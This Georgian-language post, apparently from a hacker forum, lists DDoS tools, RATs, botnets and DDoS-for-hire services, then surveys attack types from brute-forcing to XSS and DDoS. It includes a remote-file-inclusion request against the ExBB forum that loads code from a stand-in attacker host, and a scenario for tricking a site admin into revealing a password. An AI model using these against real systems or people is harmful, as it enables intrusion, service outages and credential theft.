მარტივი ინსტრუმენტები:
Fg Power DDOSER
GB DDoSeR v3
Silent-DDoSer
Drop-Dead DDoS
D.NET DDoSeR
Positve’s xDDoSeR
Sniff DDoSer
Darth DDoSeR v2
Net-Weave
Malevolent DDoSeR
HypoCrite
Host Booter v5.7
AlbaDDoS
Manta d0s v1.0
Good Bye v3.0
Good Bye v5.0
Black Peace Group DDoser
Shell Booters (შეტევა ინფიცირებულ ვერ-აპლიკაციებზე):
PHPDoS
TWBOOTER
Gray Pigeon RAT
DarkComet RAT aka Fynloski
MP-DDoser v 1.3
DarkShell
Warbot
Janidos
Aldi Bot
Infinity Bot
N0PE
Darkness
Darkness X
Optima – DarknessX control panel
Dedal
Russkill
DirtJumper
Dirt Jumper v3, aka “September”
G-Bot aka Piranha
Armageddon
კომერციული DDoS შეტევებისთვის:
WildDDOS
Death ddos service
FireDDoS
DDoS-SeRVIS
Beer DDoS
Totoro
500 Internal DDoS Service
OXIA DDoS Service
504 Gateway DDoS Tools
DDoS4Fun
NoName
Wotter DDoS Service
IceDDoS
წყარო: geocybers.com
შეტევების ნაირსახეობები:
,,ჰაკერული შეტევა” ამ სიტყვის ვიწრო გაგებით ნიშნავს ,, უსაფრთხოების სისტემაზე თავდასხმა”-ს,იმიტომ რომ სიტყვა ,,ჰაკერმა” დროთა განმავლობაში შეიცვალა თავისი მნიშვნელობა და დამახინჯდა. ,,ჰაკერული შეტევა” ამ სიტყვის ფართო გაგებით (თავდაპირველი გაგებით) - არის გონებრივი შტურმი, რომელიც მიმართულია რთული ამოცანების ამხსნის გზებზე. ჰაკერულ შეტევაში შეიძლება მონაწიობდეს ერთი ან რამდენიმე მაღალი დონის პროფესიონალი სპეციალისტი (ჰაკერი). ამ შტურმის შედეგად შეიძლება ნაპოვნი იყოს პრობლემის გადაჭრის არატრადიციული მეთოდი, ან არსებულ მეთოდებში სერიოზული კორექტურა შეიტანონ. ,,კრეკერული შეტევა” - მოქმედება, რომლის მიზანიც არის კონტროლის მოპოვება ( ან უფლების გაზრდა) Remote ან ლოკალურ სისტემაზე, ან მისი დესტაბილიზაცია, ან მწყობრიდან გამოყვანა. თავიდან შეტევის მიზეზები იყო გარკვეული შეზღუდვები, რომელიც შეეხებოდა TCP/IP პროტოკოლს. IP პროტოკოლის ადრინდელ ვერსიებში არ არსებობდა უსაფრთხოების მოთხოვნები, რომელიც მხოლოდ რამდენიმე წლის შემდეგ გამოჩნდა. მხოლოდ ინტერნეტ-კომერციის განვითარების მერე გამოჩნდა უსაფრთხოების აქტუალური პრობლემა. Mailbombing არის ყველაზე ძველი მეთოდი შეტევის, თუმცა მისი არსი მარტივი და პრიმიტიულია: დიდი რაოდენობა მაილების ხდიან შეუძლებეს საფოსტო ყუთთან და ხშირად მთელ საფოსტო სერვერთან მუშაობას. ამ მიზნით შექმნილი იყო მრავალი პროგი, და გამოუცდელ ნუბსაც შეეძლო შეტევის მოწყობა მხოლოდ მსხვერპლის მაილის და საჭირო სპამ მაილის რაოდენობის მითითებით. ასეთი სოფტები მალავდნენ რეალურ IP-ს და ხმარობდნენ ანონიმურ საფოსტო სერვერებს.ამ შეტევის თავიდან აცილება ადვილია, რადგან პროვაიდერების უმეტესობა კარგად ფილტრავენ წერილებს. პროვაიდერს შეუძლია შეზღუდოს ერთი მომხმარებლიდან მაქსიმალური წერილების რაოდენობა და შეტევა აზრს კარგავს. Pass Hacking ეს შეტევაც ადვილია. შემტევი არჩებს პაროლს შეზღუდული დოსტუპის სისტემებისთვის. ჩვეულებრივ, მომხმარებლებს და უზერებს არ შეუძლიათ რთული სიმბოლოების და რიცხვების შემცველი პაროლების დამახსოვრება. ყველაზე ხშირად პარილი არ არის 8 სიმბოლოზე მეტი და არის ან სიტყვა, ან თარიღი. თარიღის გამოყენების დროს ყველაფერი ძალიან მარტივია, რადგან 8 ციფრი- ეს მხოლოდ (!) 100 000 000 შესაძლებელი კომბინაციაა, რომელშიც პირველი ან ბოლო 4 ციფრი აღნიშნავს წელს, ეს წლები კი მხოლოდ 1900-2050 შუალედში შეიძლება იყოს. დანარჩენი 2 ციფრი აღნიშნავენ თვეს, ანუ შეიძლება იყვნენ მხოლოდ 1 და 12- ს შორის. დარჩენილი რიხვები იღებენ მნიშვნელობებს 1- 31-ს შორის- თვის რიცხვები. აქაც შეიძლება რაღაცეების ამოკლება, მაგალითად 3102(31 თებერვალი არ არსებობს), რადგან ასეთი თარიღები გამოიყენება ძალიან იშვიათად. საშუალო ბრუტერისთვის არ არის პრობლემა პაროლის პოვნა: დაახლოებით 100 პაროლის შემოწმებისას ეს დრო დაიკავებს მაქსიმუმ რამდენიმე დღეს. ფრაზების დროს ყველაფერი გაცილებით რთულადაა, რადგან რომ ავიღოთ თუნდაც მარტო ინგლისური ალფავიტი 26 ასოსგან, ფრაზას 8 სიმბოლოსგან შეიძლება ქონდეს 208 827 064 576 (26-ის მერვე ხარისხი), რაც ათასჯერ უფრო რთულია. აქ კი გვეხმარება ჩვენი გონება: მეეჭვება რიგითმა მომხმარებელმა დაიწყოს სიმბოლოების შემთხვევითი თანმიმდევრობა პაროლად, ანუ საკმარისია გავბრუტოთ ყველა არსებული სიტყვა ინგლისურში, რომელიც 200 000 ზე მეტი არაა (ჟარგონების და იშვიათი სიტყვების ჩათვლით), ეს კი უკვე მილიონჯერ უფრო ადვილია, ვიდრე 208 827 064 576 ვარიანტის განხილვა. გარდა ამისა, თუ უფრო ყურადღებით დავფიქრდებით, ხალხის უმეტესობას, რომელიც რომელიმე სფეროში მუშაობს,გაცილებით მცირე სიტყვა აქვს თავის ლექსიკაში, რაც სავარაუდო პაროლის რაოდენობას ბევრად ამცირებს. გარდა ამისა უნდა მივაქციოთ ყურადღება იმას, რომ პაროლი შეიძლება იყოს ახლობლები, შინაური ცხოველების და ქალაქების სახელიები, რაც ბევრად აადვილებს საქმეს. მიუხედავად ამ ყველაფრისა, არ გეგონოთ, რომ პაროლის გაბრუტვა ადვილია. ზოგი უზერი ( განსაკუთრებით სისტემური ადმინისტრატორები) იყენებს პაროლად შემთხვევით თანმიმდევრობას ასოების ციფრებთან ერთად. არსებობს სანდო პაროლის შექმნის და დამახსოვრების მრავალი ხერხი. მაგალითად, ამ ფრაზის პირველი ასოებიდან ,, Hacking has changed my life very much" ვიღებთ პაროლს hhcmlvm , რომლის გაბრუტვასაც რამდენიმე ტრილიონი ვარიანტი ჭირდება. ვირუსები, ტროიანები, მაილ ვორმები, სნიფერები, Rootkit- ები და სხვა სპეციალური პროგრამები შეტევის ეს ხერხი არის ყველაზე იმპროვიზირებული. აქ ყველაფერი დამოკიდებუკია ჰაკერის გონებაზე. ეს შეტევები არის სპეციალური სოფტების გამოყენება მსხვერპლის კომპზე სამუშაოდ. ესეთი სოფტები განკუთვნილია მფლობელისთვის საიდუმლო ინფორმაციის მოძებნა / გადაცემისთვის, ან მხოლოდ სისტემისთვის ზიანის მიყენებისთვის და მისი მწყობრიდან გამოყვანისთვის. ამ პროგრამების მოქმედების პრინციპები სხვადასხვა, ამიტომ მათ აქ არ განვიხილავთ. ქსელური დაზვერვა შეტევის ეს ხერხი შედის მოსამზადებელ ეტაპში. ამ შეტევის დროს კრეკერი არაფერს არ აზიანებს, მაგრად შედეგად მას შეუძლია მიიღოს დახურული ინფორმაცია მსხვერპლის კომპის ფუნქციონირების შესახებ. მიღებული ინფორმაცია გამოიყენება მომავალი შეტევის გონიერად დაგეგმვისთვის. ასეთი დაზვერვის დროს ჰაკერმა შეიძლება დაასკანეროს პორტები, DNS - მოთხოვნები, ღია პორტების დატესტვა ექოს პრინციპით, პროქსი სერვერების რაოდენობა და დაცვის დონე. შედეგად შესაძლებელია ინფორმაციის მიღება სისტემაში არსებულ DNS-მისამართებზე, ვინ ეკუთვნიან ისინი, რომელი სერვისებია მათზე ხელმისაწვდომი, დოსტუპის დონე ამ სერვისებთან შიდა და გარე მომხმარებლებისთვის. პაკეტების სნიფინგი. ასევე ძალიან გავრცელებული შეტევის ხერხი, რომელიც დაფუძნებულია ქსელის კარტის მუშაობის რეჟიმზე ,,promiscuous mode”. ამ რეჟიმში ყველა ის ინფორმაციული პაკეტი, რომელსაც ქსელის კარტა იღებს, გადაეცემა განხილვისთვის სპეციალურ გადამამუშავებელ პროგს. შედეგად ბოროტმოქმედმა ( სტატიის ავტორი Blackhat-ებს გულისხმობს ბოროტმოქმედში ) შეიძლება მოიპოვოს დიდი რაოდენობით დაფარული ინფორმაცია: ვინ საიდან სად გადასცემდა პაკეტებს, რომელ მისამართებს გადიოდნენ ეს პაკეტები და ა.შ. ყველაზე საშიში ამ შეტევაში ისაა, რომ მან (კრეკერმა) შეიძლება ხელში ჩაიგდოს ისეთი ინფორმაცია, რომლითაც ის შეძლებს უკანონოდ შეღწევას სისტემაში ჩვეულებრივი თანამშრომლის ლოგინ-ს ამოფარებული. (ინფორმაციაში იგულისხმება ლოგინები, პაროლები და ა.შ. ) IP - სპუფინგი ასევე შეტევის გავრცელებული შესაძლებლობა. გამოიყენება არასაკმარისად დაცულ ქსელებში, როცა ბოროტმოქმედი წარმოაჩენს თავს, როგორც დასკანირებულ მომხმარებელს, და ამ დროს არის ან თვითონ ორგანიზაციაში, ან მის ფარგლებს გარეთ. ამისთვის კრეკერმა უნდა ისარგებლოს იმ IP- ით, რომელიც ნებადართულია ქსელის უსაფრთხოების სისტემაში. ესეთი შეტევა შესაძლებელია, თუ უსაფრთხოების სისტემა ახდენს მომხმარებლის მხოლოდ IP-ის იდენტიფიკაციით და არ ითხოვს დამატებით დადასტურებებს. Man-in-the-Middle შეტევის ხერხი, როცა კრეკერი ახდენს 2 სისტემას შორის კავშირის არხის გადამისამართებას თავისკენ, და იღებს დოსტუპს ყველა გადაცემულ ინფორმაციასთან. ასეთ დონის ინფორმაციაზე დოსტუპის მიღების შემდეგ კრეკერს შეუძლია ინფორმაციის მისთვის საჭირო გზით მოდიფიცირება, რათა მიაღწიოს საკუთარ მიზანს. ამ შეტევის მიზანია გადაცემული ინფორმაციის ფალსიფიცირება და მოპარვა, ანდა დოსტუპის მიღება ქსელის რესურსებთან. ასეთი შეტევებისთვის ყურადღებისდევნება საკმაოდ ძნელია, რადგან ჩვეულებრივ, ბოროტმოქმედი, არის ორგანიზაციის შიგნით. მაგალითი (!) : მაგალითად ობიექტმა A- მ უნდა გადასცეს გარკვეული ინფორმაცია ობიექტ B-ს. ობიექტი C კი არის კრეკერი. ობიექტი C წარუდგენს ობიექტ A- ს თავის თავს, როგორც ობიექტი B, ბოლო ობიექტ B-ს, როგორც ობიექტი A. შედეგად, როცა ობიექტი A უგზავნის ობიექტ B-ს რამე ინფორმაციას, იგი სინამდვილეში ამ ინფორმაციას ობიექტ C-ს გადასცემს, თუმცა გონია, რომ ეს ობიექტ B-ს გადასცა. ობიექტი C იღებს ამ ინფორმაციას, ცვლის ისე, როგორც მას სურს, და გადასცემს ობიექტ B-ს. ობიექტ B-ს გონია, რომ ინფორმაცია მიიღო ობიექტი A-გან, ანუ ყველაფერი წესრიგშია =) ინექცია შეტევა, რომელიც დაკავშირებულია ინექციის სხვადასხვა მეთოდებთან, წარმოადგენს მუშა სისტემაში სხვადასხვა ბრძანებების ან მონაცემების შეყვანას (ინექციას), სისტემის მუშაობის შესაცვლელად. შედეგად - ჰაკერი იღებს დოსტუპს დახურულ ფუნქციებთან და ინფორმაციასთან, ანდა მთლიანი სისტემის მუშაობის დესტაბილიზაციას. ყველაზე პოპულარულია ეს შეტევა ინტერნეტის ქსელში, თუმცა ასევე შესაძლებელია მოხდეს სისტემის DOS-იდანაც. ( არ ვიცი DOS ქართულად როგორაა, საკომანდო ხაზი? ) . SQL- ინექცია - შეტევა, რომლის დროსაც ცვლიან SQL- ის მოთხოვნების პარამეტრებს მონაცემთა ბაზაში. შედეგად მოთხოვნა იღებს სრულიად სხვა სახეს, და შემომავალი მონაცემების არასაკმარისი ფილტრაციის შემთხვევაში შეუძლია არამხოლოდ კონფიდენციალური ინფორმაციის გამოტანა, არამედ შეცვლა / წაშლაც. ძალიან ხშირად შეტევის ასეთი ხერხი შეიძლება ვნახოთ ისეთი საიტების მაგალითზე, რომლების იყენებენ DOS-ის პარამეტრებს (მოცემულ შემთხვევაში - URL) SQL- მოთხოვნების მონაცემთა ბაზისთვის გადაცემას ყოველგვარი დამატებითი შემოწმების გარეშე. PHP- ინექცია - ერთ-ერთი ხერხი ვებ-საიტების გასატეხად, რომლების PHP-ზე მუშაობენ. მისი არსი იმაშია, რომ , რომ შეიყვანოს სპეციალურად ფორმირებული სცენარი ვებ- სოფტის კოდში საიტის სერვერის მხარეზე, რასაც მივყავართ მოთხოვნილი ბრძანებების შესრულებამდე. ცნობილია, რომ მრავალ, ინტერნეტში გავრცელებულ უფასო დვიჟოკებში და ფორუმებში, რომლების მუშაობენ PHP- ზე( ყველაზე ხშირად ესენია მოძველებული ვერსიები). ასეთ დვიჟოკებზე არის ხოლმე ბოლომდე არ განხილული და ბოლომდე არ გათვლილი მოდულები, ან ცალკეული კონსტრუქციები ხვრელებით. ჰაკერები ასეთ ხვრელებს უკეთებენ ანალიზს, და მათი კარგად დამუშავების შემდეგ იღებენ სასურველ ინფორმაციას მაგალითი (!). ფორუმში ExBB არის უძველესი დირკა, რომელიც გამოიყენება ჰაკერების მიერ შემდეგი მოთხოვნით : GET //modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt????? . Cross Site Scripting ანუ XSS - დირკების ტიპი, რომელიც ჩვეულებრივ არის ვებ-სოფტებში, რომელიც აძლევს ჰაკერს საშუალებას შეიყვანოს კოდი იმ გვერდებში, რომელსაც სხვა მომხმარებლების ნახულობენ. ასეთი კოდის მაგალითებია HTML კოდი და სკრიპტები, რომლების სრულდება კლიენტის მხარეზე, ყველაზე ხშირად კი javascript . სხვა სახელებია ამ შეტევის - CSS , ან სკრიპტული ინექცია. მაგალითი (!) ქვემოთ მოყვანილი მაგალითი ავიღე სტატიიდან ,, TBC , თიბისი ბანკი” (დაწერილია micr0 - მიერ ) ოდნავ შევცვალე ტექსტი და მოვარგე სტატიას. დიდი მადლობა micr0-ს . სააავტორო უფლებები დაცულია თბს- ბანკის ბაგი (by micr0) XPath-ინექცია - ხვრელების ტიპი, რომლის აზრიც არის XPath - გამოთქმების შეყვანა ორიგინალურ მოთხოვნაში. ეს ხდება XML მონაცემთა ბაზაში. როგორც სხვა ინექციების დროს, ხვრელი გამოყენებადია მაშინ, როცა ხდება შემავალი მონაცემების არასაკმარისი გაფილტვრა სოციალური ინჟინერია სოციალური ინჟინერია არის რაიმე ოფისში ან ორგანიზაციაში მომსახურე პერსონალის არაპროფესიონალიზმის, არაკომპეტენტურობის ან უგულისყურობის გამოყენება, რათა მივიღოთ დოსტუპი სასურველ ინფორმაციასთან. ეს მეთოდი ჩვეულებრივ გამოიყენება კომპიუტერის გარეშე, ჩვუელებრივი ტელეფონის, მიწერ-მოწერის ან სულაც, 1 კათხა ლუდის დახმარებით. =) ამგვარად მიიღება სრულად განსხვავებული ინფორმაციები. ასეთი შეტევის დროს ბოროტმოქმედი ახდენს დაკავშირებას მსხვერპლთან. შემდეგ ან აბნევს მას, ან აღწევს იმდენს, რომ მსხვერპლი მას ენდობა. ამის შემდეგ ცდილობს მიიღოს აუცილებელი ინფორმაცია, რომლის სხვა გზებით მიღება საკმაოდ რთულია, რადგან სხვა გზები გარკვეულ რისკთან არის დაკავშირებული. როგორც ძველი ანდაზა ამბობს, ,,ყველაზე სუსტი რგოლი უსაფრთხოების სისტემაში არის თვითონ ადამიანი ". მაგალითად (!). მე მინდა დავჰაკო რამე საიტი. ეს საიტი არის საკმაოდ დაცული. მე ვადგენ,ვინ არის ადმინი. გვარი, სახელი, მისამართი და ა.შ. ,ვადგენ მის ჰობის. მაგალითად, იგი თამაშობს რამე ონლაინ თამაშს. მე ვეკონტაქტები ადმინს, შევდივარ დავერიეში, საერთო სასაუბრო თემაც ნაპოვნია - ის ონლაინ თამაში. შემდეგ მიდის ბაზარი ცხოვრებაზე, რამდენი ხანია კომთან ზიხარ და ეგეთები. ვიგებთ, რომ აქვს საიტი =). რადგან უკვე ჩვენი მეგობარია, ვეკითხებით, რა არის მისი საყვარელი პაროლი იმ თამაშის ანგარიშებზე, ისიც დაუბრკოლებლად გვეუბნება, რადგან ჩვენი მეგობარია . და ა.შ. ამ დარგში იმპროვიზაცია ძალიან აუცილებელია. Denial of Service DoS შეტევის მიზანია აიძულოს მსხვერპლი კომპიუტერი უარი თქვას მომხარებლებთან ურთიერთობაზე. შეტევის ამ ტიპის მიზანი არ არის (!) რაიმე ტიპის დაფარული ინფორმაციის მიღება, მაგრამ ხანდახან არის გარკვეული სახით, ნიადაგის მომზადება სხვა შეტევებისთვის. მაგალითად, ზოგიერთ სოფტს მისი პროგრამული შეცდომების გამო შეუძლიათ გამოიწვიონ განსაკუთრებული სიტუაციები, და სერვისების გათიშვის შემდგომ შეუძლიათ შეასრულონ ის ბრძანებები, რომელიც მათ ჰაკერმა მისცა, ან შეიძლება მოხდეს სერვერზე ერთგვარი ზვავური შეტევა, როცა სერვერს არ შეუძლია უამრავი შემავალი პაკეტის მიღება და ითიშება გადატვირთვის გამო. ამ დროს ითიშება ბევრი დაცვის სისტემაც. Distributed Denial of Service DDoS არის DOS შეტევის ერთ-ერთი სახე. აქვს იგივე მიზნები,რაც DOS შეტევას, თუმცა განსხვავებით მისგან, ხდება არა 1, არამედ რამდენიმე კომპიუტერიდან ერთდროულად. შეტევის ამ ტიპის დროს ხდება ან შეცდომების გამოწვევა, რომელსაც მივყავართ სისტემის გამორთვამდე, ან დაცვის ტყუილად ჩართვა, რაც თავისთავად სისტემას ბლოკავს და სისტემაც ითიშება. DDOS გამოიყენება იქ, სადაც ჩვეულებრივი DOS არაეფექტურია. ამისთვის რამდენიმე კომპი ერთიანდება, და თითოეული მათგანი ახდენს ერთდროულ DOS შეტევას მსხვერპლზე. ამას ერთად ქვია DDOS შეტევა. ( სხვათაშორის, სწორედ ამ მეთოდით გატეხეს აგვსტოში რუსებმა საქართველოს მთავრობის საიტები. ისინი ტვირთავდნენ ტრაფიკს, საიტები ვერ უძლებდნენ და ითიშებოდნენ). ნებისმიერი შეტევა არის მხოლოდ და მხოლოდ მცდელობა გამოიყენოს მსხვერპლის უსაფრთხოების სისტემის არასრულყოფილება ან დაფარული ინფორმაციის მისაღებად, ან სისტემის დასაზიანებლად, ამიტომ ყველა წარმატებული შეტევის მიზეზი არის ჰაკერის პროფესიონალიზმი და ინფორმაციის მნიშვნელობა, ამასთანავე სისტემური ადმინისტრატორის არაკომპეტენტურობა და არასრულყოფილი პროგრამული უზრუნველყოფა.
|
